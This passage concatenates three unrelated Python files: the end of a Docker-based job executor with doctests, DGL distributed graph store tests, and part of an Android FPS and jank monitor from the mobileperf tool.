>>> # Doctest end, clearing noise
>>> shutil.rmtree(tmp_dir)
>>> os.path.exists(tmp_dir)
False
"""
self.log_dir = self._create_log_dir(p.remote_out_dir, self.job_id)
tmp_dir = self._make_tmpdir(p, self.job_id)
volumes = {
p.remote_inp_dir: {"bind": p.docker_inp_dir, "mode": "rw"},
p.remote_out_dir: {"bind": p.docker_out_dir, "mode": "rw"},
p.remote_work_dir: {"bind": p.docker_work_dir, "mode": "rw"},
}
return p.image_name, volumes, p.arguments, tmp_dir
def process_params(self, params):
"""
        After the parameters are extracted they need to be processed further
        so that the job can actually be executed.
>>> from executor import Executor
>>> e = Executor()
>>> try:
... e.process_params()
... except:
... print('Params Required')
...
Params Required
"""
image, volumes, docker_cmd, tmp_dir = self._construct_docker_cmd(params)
self.run_docker(
params.docker_cred, image, params.environment, volumes, docker_cmd
)
self._preserve_tmp_data(params.preserve, tmp_dir, params.remote_out_dir)
def _docker_login(self, credentials):
"""
        If you have a privately owned docker image it needs to be pulled.
        Pulling the image from Docker Hub requires a login, so you need to
        provide Docker Hub credentials for that.
>>> from executor import Executor
>>> e = Executor()
>>> credentials = None
>>> e._docker_login(credentials)
"""
if credentials:
self.docker_client = docker.from_env()
self.docker_client.login(
username=credentials.username, password=credentials.password
)
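    # A minimal sketch of the credentials object _docker_login() expects: the
    # method only reads .username and .password, so any object exposing those
    # attributes works. The values below are placeholders, not real credentials
    # (illustrative only):
    #
    #   creds = AttrDict({'username': 'hub_user', 'password': 'hub_token'})
    #   e._docker_login(creds)  # logs in so a private image can be pulled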
def run_docker(self, cred, image, env, volumes, cmd):
"""
        The Docker image is executed after it has been pulled successfully
        and the docker command has been constructed from the job parameters.
"""
self.log.info("run_docker", state=self.state)
self._docker_login(cred)
self.docker_client = docker.from_env()
self.container_id = self.docker_client.containers.run(
image,
environment=env,
volumes=volumes,
command=cmd,
stderr=True,
detach=True,
)
self.container_id.wait()
self.log.info("Stopping container")
self.container_id.stop()
self.log.info("container_stopped")
self.container_id.remove()
self.container_id = None
self.log.info("container_removed")
self.state = self.WREADY
self.log.info("docker_done", worker_state=self.state)
@keeprunning()
def _get_container_stdout(self):
if self.container_id:
self.container_stdout = self.container_id.logs(
stdout=True, stderr=False
).decode("utf-8", "ignore")
def _get_container_stdout_daemon(self):
stdout = Thread(target=self._get_container_stdout)
stdout.daemon = True
stdout.start()
return stdout
@keeprunning()
def _get_container_stderr(self):
if self.container_id:
self.container_stderr = self.container_id.logs(
stdout=False, stderr=True
).decode("utf-8", "ignore")
def _get_container_stderr_daemon(self):
stderr = Thread(target=self._get_container_stderr)
stderr.daemon = True
stderr.start()
return stderr
@keeprunning()
def _write_stdout_stderr(self):
if self.container_id:
stdout_f = open(os.path.join(self.log_dir, "stdout"), "w+")
stderr_f = open(os.path.join(self.log_dir, "stderr"), "w+")
if self.container_stdout:
stdout_f.write(self.container_stdout)
if self.container_stderr:
stderr_f.write(self.container_stderr)
def _write_stdout_stderr_daemon(self):
write = Thread(target=self._write_stdout_stderr)
write.daemon = True
write.start()
return write
def _create_log_dir(self, out_dir, job_id):
log_dir = os.path.join(out_dir, "logs", repr(job_id))
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def _get_job_state_daemon(self):
"""
        While the job is being executed, its state may change to one of the
        following:
            pause
            restart
            cancel
        In these cases it is important to keep fetching the state of the job so
        that the corresponding operations can be performed.
>>> from executor import Executor
>>> e = Executor()
>>> th = e._get_job_state_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
job_state = Thread(target=self._get_job_state)
job_state.daemon = True
job_state.start()
return job_state
@keeprunning()
def _get_job_state(self):
"""
Responsible for continuously getting the state of the job which is being executed
"""
self.job_state = self.master.worker.get_job_state(job_id=self.job_id)
@keeprunning()
def _handle_job_operations(self):
"""
        Once the docker container has been started, there can be external
        operations such as pause, restart, and cancel, which should be handled.
"""
if self.job_state == "paused":
self.container_id.pause()
if self.job_state == "resumed":
self.container_id.unpause()
if self.job_state == "cancelled":
# self.log.info('STOOOOOOOOOOOOPIN')
self.container_id.kill()
# self.log.info('STOPPPPPPPPPPPPPPPDDDDDDDDDD')
def _handle_job_operations_daemon(self):
job_operation = Thread(target=self._handle_job_operations)
job_operation.daemon = True
job_operation.start()
@keeprunning()
def _progress(self):
"""
Responsible for getting progress on your job
"""
# FIXME: hardcoding
# FIXME: progress.txt appended with job_id
progress = os.path.join(
self.remote_work_dir, "progress.txt" + repr(self.job_id)
)
if os.path.exists(progress):
progress_f = open(progress)
self._get_progress_update(progress_f)
progress_f.close()
# self.log.info("removing progress file", job_state=self.job_state, state=self.state)
if self.state == self.WREADY or self.job_state == "cancelled":
os.remove(progress)
def _get_progress_update(self, f):
"""
        If your job reports progress, the progress file needs to be parsed.
>>> try:
... e._get_progress_update()
... except:
... print('Filepointer Required')
...
Filepointer Required
"""
prev_update = None
while self.state != self.WREADY:
update = f.readline()
# self.log.info("insidie _get_progress_update", state=self.state, update=update)
if not update:
if prev_update:
self.log.info("progress_update", cur_update=prev_update)
cur_update = prev_update
self._update_progress(cur_update)
prev_update = None
continue
prev_update = update.strip()
def _update_progress(self, progress):
"""
After progress is parsed it needs to be sent to the master machine.
"""
self.master.worker.update_progress(job_id=self.job_id, progress=progress)
def _make_tmpdir(self, p, job_id):
"""
        If your job uses a temporary directory for writing out temporary
        files, these will be stored locally on the executor machine.
>>> import random
>>> random.seed(1)
>>> from executor import Executor
>>> e = Executor()
>>> params = {'arguments': 'arguments',
... 'docker_cred': '',
... 'docker_inp_dir': 'internal_input/',
... 'docker_out_dir': 'internal_output/',
... 'docker_work_dir': 'internal_workdir/',
... 'environment': {},
... 'image_name': 'image',
... 'job_id': 'id',
... 'job_name': 'job_name',
... 'preserve': 'preserve',
... 'remote_inp_dir': 'external_input/',
... 'remote_out_dir': 'external_output/',
... 'remote_work_dir': 'external_workdir/'}
>>> params = AttrDict(params)
>>> job_id = random.randint(0, 9)
>>> tmp_dir = e._make_tmpdir(params, job_id)
>>> tmp_dir
'external_workdir/2job_name'
>>> # Doctest end, clearing noise
>>> shutil.rmtree(params.remote_work_dir)
>>> shutil.rmtree(params.remote_out_dir)
>>> os.path.exists(params.remote_out_dir)
False
>>> os.path.exists(params.remote_work_dir)
False
"""
tmp_path = os.path.join(p.remote_work_dir + repr(job_id) + p.job_name)
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
return tmp_path
def _preserve_tmp_data(self, preserve, tmp_dir, out_dir):
"""
        As part of the job parameters you need to provide a boolean value that
        determines whether the temporary files written during job execution are
        kept. True preserves them in your output directory; otherwise they are
        deleted.
>>> from executor import Executor
>>> e = Executor()
>>> tmp_dir = 'temporary_dir/'
>>> out_dir = 'output_dir/'
>>> os.mkdir(tmp_dir)
>>> os.path.exists(tmp_dir)
True
>>> os.mkdir(out_dir)
>>> os.path.exists(out_dir)
True
>>> preserve = True
>>> e._preserve_tmp_data(preserve, tmp_dir, out_dir)
>>> os.path.exists(tmp_dir)
False
>>> os.path.exists(out_dir)
True
>>> os.path.exists(out_dir + tmp_dir)
True
>>> os.listdir(out_dir)
['temporary_dir']
>>> # Doctest done, cleaning noise
...
>>> shutil.rmtree(out_dir)
>>> os.path.exists(out_dir)
False
>>> os.path.exists(tmp_dir)
False
>>> preserve = False
>>> os.mkdir(tmp_dir)
>>> os.mkdir(out_dir)
>>> e._preserve_tmp_data(preserve, tmp_dir, out_dir)
>>> os.path.exists(tmp_dir)
False
>>> os.path.exists(out_dir)
True
>>> os.path.exists(out_dir + tmp_dir)
False
>>> os.listdir(out_dir)
[]
>>> # Doctest done, cleaning noise
...
>>> shutil.rmtree(out_dir)
>>> os.path.exists(out_dir)
False
>>>
"""
if not preserve:
try:
shutil.rmtree(tmp_dir)
except:
# FIXME: add no file exception
pass
else:
shutil.move(tmp_dir, out_dir)
@keeprunning()
def update_state(self):
"""
        Responsible for sending the executor state to the master machine,
        whether or not a job is being executed.
"""
self.master.worker.update_state(job_id=self.job_id, state=self.state)
def _state_daemon(self):
"""
        A daemon thread is required to send the state of the executor.
        The state of the executor will change between ready and busy
        depending on whether it is executing a job or not.
>>> from executor import Executor
>>> e = Executor()
>>> th = e._state_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
state = Thread(target=self.update_state)
state.daemon = True
state.start()
return state
def _progress_daemon(self):
"""
        If the docker image supports reporting progress while the job is
        executing, this thread is responsible for sending that progress to
        the master machine on a regular basis.
>>> from executor import Executor
>>> e = Executor()
>>> th = e._progress_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
progress = Thread(target=self._progress)
progress.daemon = True
progress.start()
return progress
|
test_dist_graph_store.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import dgl
import sys
import numpy as np
import time
import socket
from scipy import sparse as spsp
from numpy.testing import assert_array_equal
from multiprocessing import Process, Manager, Condition, Value
import multiprocessing as mp
from dgl.heterograph_index import create_unitgraph_from_coo
from dgl.data.utils import load_graphs, save_graphs
from dgl.distributed import DistGraphServer, DistGraph
from dgl.distributed import partition_graph, load_partition, load_partition_book, node_split, edge_split
from dgl.distributed import SparseAdagrad, DistEmbedding
from numpy.testing import assert_almost_equal
import backend as F
import math
import unittest
import pickle
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def create_random_graph(n):
arr = (spsp.random(n, n, density=0.001, format='coo', random_state=100) != 0).astype(np.int64)
return dgl.graph(arr)
def run_server(graph_name, server_id, num_clients, shared_mem):
g = DistGraphServer(server_id, "kv_ip_config.txt", num_clients,
'/tmp/dist_graph/{}.json'.format(graph_name),
disable_shared_mem=not shared_mem)
print('start server', server_id)
g.start()
def emb_init(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def rand_init(shape, dtype):
return F.tensor(np.random.normal(size=shape), F.float32)
def run_client(graph_name, part_id, num_clients, num_nodes, num_edges):
time.sleep(5)
gpb, graph_name = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph("kv_ip_config.txt", graph_name, gpb=gpb)
check_dist_graph(g, num_clients, num_nodes, num_edges)
def check_dist_graph(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats1 = g.ndata['features'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges() / 2))
feats1 = g.edata['features'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes(), 2)
g.ndata['test1'] = dgl.distributed.DistTensor(g, new_shape, F.int32)
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# reference to a one that exists
test2 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test2', init_func=rand_init)
test3 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test2')
assert np.all(F.asnumpy(test2[nids]) == F.asnumpy(test3[nids]))
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor(g, (g.number_of_nodes(), 3), F.float32, 'test3')
del test3
    # test a persistent tensor
test4 = dgl.distributed.DistTensor(g, new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
try:
test4 = dgl.distributed.DistTensor(g, (g.number_of_nodes(), 3), F.float32, 'test4')
raise Exception('')
except:
pass
# Test sparse emb
try:
emb = DistEmbedding(g, g.number_of_nodes(), 1, 'emb1', emb_init)
lr = 0.001
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats = emb(nids)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids), 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
policy = dgl.distributed.PartitionPolicy('node', g.get_partition_book())
grad_sum = dgl.distributed.DistTensor(g, (g.number_of_nodes(),), F.float32,
'emb1_sum', policy)
assert np.all(F.asnumpy(grad_sum[nids]) == np.ones((len(nids), 1)) * num_clients)
assert np.all(F.asnumpy(grad_sum[rest]) == np.zeros((len(rest), 1)))
emb = DistEmbedding(g, g.number_of_nodes(), 1, 'emb2', emb_init)
with F.no_grad():
feats1 = emb(nids)
assert np.all(F.asnumpy(feats1) == 0)
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats1 = emb(nids)
feats2 = emb(nids)
feats = F.cat([feats1, feats2], 0)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids) * 2, 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
with F.no_grad():
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * math.sqrt(2) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
except NotImplementedError as e:
pass
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.ndata['features']) == g.number_of_nodes()
assert g.ndata['features'].shape == (g.number_of_nodes(), 1)
assert g.ndata['features'].dtype == F.int64
assert g.node_attr_schemes()['features'].dtype == F.int64
assert g.node_attr_schemes()['test1'].dtype == F.int32
assert g.node_attr_schemes()['features'].shape == (1,)
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book())
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes())
for n in nodes:
assert n in local_nids
print('end')
def check_server_client(shared_mem, num_servers, num_clients):
prepare_dist(num_servers)
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client, args=(graph_name, 0, num_clients, g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
def test_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_server_client(True, 1, 1)
check_server_client(False, 1, 1)
check_server_client(True, 2, 2)
check_server_client(False, 2, 2)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
def test_standalone():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dist_g = DistGraph("kv_ip_config.txt", graph_name,
part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_graph(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
def test_split():
#prepare_dist()
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
for i in range(num_parts):
dgl.distributed.set_num_client(num_parts)
part_g, node_feats, edge_feats, gpb, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes1 = np.intersect1d(selected_nodes, F.asnumpy(local_nids))
nodes2 = node_split(node_mask, gpb, i, force_even=False)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes2)))
local_nids = F.asnumpy(local_nids)
for n in nodes1:
assert n in local_nids
dgl.distributed.set_num_client(num_parts * 2)
nodes3 = node_split(node_mask, gpb, i * 2, force_even=False)
nodes4 = node_split(node_mask, gpb, i * 2 + 1, force_even=False)
nodes5 = F.cat([nodes3, nodes4], 0)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes5)))
dgl.distributed.set_num_client(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges1 = np.intersect1d(selected_edges, F.asnumpy(local_eids))
edges2 = edge_split(edge_mask, gpb, i, force_even=False)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges2)))
local_eids = F.asnumpy(local_eids)
for e in edges1:
assert e in local_eids
dgl.distributed.set_num_client(num_parts * 2)
edges3 = edge_split(edge_mask, gpb, i * 2, force_even=False)
edges4 = edge_split(edge_mask, gpb, i * 2 + 1, force_even=False)
edges5 = F.cat([edges3, edges4], 0)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges5)))
def test_split_even():
#prepare_dist(1)
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
all_nodes1 = []
all_nodes2 = []
all_edges1 = []
all_edges2 = []
for i in range(num_parts):
dgl.distributed.set_num_client(num_parts)
part_g, node_feats, edge_feats, gpb, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes = node_split(node_mask, gpb, i, force_even=True)
all_nodes1.append(nodes)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(local_nids))
print('part {} get {} nodes and {} are in the partition'.format(i, len(nodes), len(subset)))
dgl.distributed.set_num_client(num_parts * 2)
nodes1 = node_split(node_mask, gpb, i * 2, force_even=True)
nodes2 = node_split(node_mask, gpb, i * 2 + 1, force_even=True)
nodes3 = F.cat([nodes1, nodes2], 0)
all_nodes2.append(nodes3)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(nodes3))
print('intersection has', len(subset))
dgl.distributed.set_num_client(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges = edge_split(edge_mask, gpb, i, force_even=True)
all_edges1.append(edges)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(local_eids))
print('part {} get {} edges and {} are in the partition'.format(i, len(edges), len(subset)))
dgl.distributed.set_num_client(num_parts * 2)
edges1 = edge_split(edge_mask, gpb, i * 2, force_even=True)
edges2 = edge_split(edge_mask, gpb, i * 2 + 1, force_even=True)
edges3 = F.cat([edges1, edges2], 0)
all_edges2.append(edges3)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(edges3))
print('intersection has', len(subset))
all_nodes1 = F.cat(all_nodes1, 0)
all_edges1 = F.cat(all_edges1, 0)
all_nodes2 = F.cat(all_nodes2, 0)
all_edges2 = F.cat(all_edges2, 0)
all_nodes = np.nonzero(node_mask)[0]
all_edges = np.nonzero(edge_mask)[0]
assert np.all(all_nodes == F.asnumpy(all_nodes1))
assert np.all(all_edges == F.asnumpy(all_edges1))
assert np.all(all_nodes == F.asnumpy(all_nodes2))
assert np.all(all_edges == F.asnumpy(all_edges2))
def prepare_dist(num_servers):
ip_config = open("kv_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
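# Since get_local_usable_addr() already returns "ip port", the file written above
# contains a single line of the form "192.168.8.12 50051 1" (ip/port values are
# illustrative; the trailing number is num_servers).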
if __name__ == '__main__':
os.makedirs('/tmp/dist_graph', exist_ok=True)
test_split()
test_split_even()
test_server_client()
test_standalone()
|
fps.py
|
# -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS monitor
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
        self.jank_threshold = jank_threshold / 1000.0  # internal timestamps are in seconds
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
        # queue used by the reporting thread
self.fps_queue = fps_queue
def start(self,start_time):
        '''Start the SurfaceStatsCollector
        '''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
                # if self.focus_window contains the character '$', it must be escaped
if (self.focus_window.find('$') != -1):
self.focus_window = self.focus_window.replace('$','\$')
except:
                logger.warn(u'Unable to get the current Activity name dynamically, falling back to page_flip to measure the full-screen frame rate!')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
        '''Stop the SurfaceStatsCollector
        '''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
        '''Get the activity (window) name via `dumpsys window windows`
        '''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_results_new(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
elif frame_count == 2 or frame_count ==3 or frame_count==4:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank = self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_jankey_new(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_jankey_new(self,timestamps):
        '''A frame counts as one jank only when both conditions hold:
        1) Display FrameTime > 2x the average duration of the previous three frames.
        2) Display FrameTime > the duration of two movie frames (1000ms/24*2 ≈ 83.33ms).
'''
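        # Worked example (illustrative numbers): if the previous three frames took
        # 16ms, 17ms and 18ms, their average is 17ms, so condition 1 requires the
        # current frame to exceed 2 * 17ms = 34ms. A 90ms frame exceeds both 34ms
        # and 83.3ms and is counted as a jank; a 60ms frame exceeds 34ms but not
        # 83.3ms, so it is not.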
twofilmstamp = 83.3 / 1000.0
tempstamp = 0
        # count dropped-frame janks
jank = 0
for index,timestamp in enumerate(timestamps):
            # for the first four frames, anything over 166ms counts as a jank
if (index == 0) or (index == 1) or (index == 2) or (index == 3):
if tempstamp == 0:
tempstamp = timestamp[1]
continue
                # time taken to draw the frame
costtime = timestamp[1] - tempstamp
                # if the frame takes longer than the threshold (10 vsync periods) the user perceives jank
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
elif index > 3:
currentstamp = timestamps[index][1]
lastonestamp = timestamps[index - 1][1]
lasttwostamp = timestamps[index - 2][1]
lastthreestamp = timestamps[index - 3][1]
lastfourstamp = timestamps[index - 4][1]
tempframetime = ((lastthreestamp - lastfourstamp) + (lasttwostamp - lastthreestamp) + (
lastonestamp - lasttwostamp)) / 3 * 2
currentframetime = currentstamp - lastonestamp
if (currentframetime > tempframetime) and (currentframetime > twofilmstamp):
jank = jank + 1
return jank
def _calculate_janky(self,timestamps):
tempstamp = 0
        # count dropped-frame janks
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
            # time taken to draw the frame
costtime = timestamp[1] - tempstamp
            # if the frame takes longer than the threshold (10 vsync periods) the user perceives jank
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
        '''Process the surfaceflinger data
        '''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
# fps,jank = self._calculate_results(refresh_period, timestamps)
fps, jank = self._calculate_results_new(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
                    if not self.fps_queue:  # save data to file when this script runs standalone
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
        '''Collect the surfaceflinger data.
        Two methods are used: when use_legacy_method is True, root permission is
        required and `service call SurfaceFlinger 1013` is used to get the frame count;
        when it is False, `dumpsys SurfaceFlinger --latency` is used.
        On Android 8.0 `dumpsys SurfaceFlinger` returns nothing, so
        `dumpsys gfxinfo package_name framestats` is used instead.
        '''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
                        # the activity changed and the old activity no longer exists, so the fetched timestamps are empty
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
                    # only keep frames that have not been counted yet
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
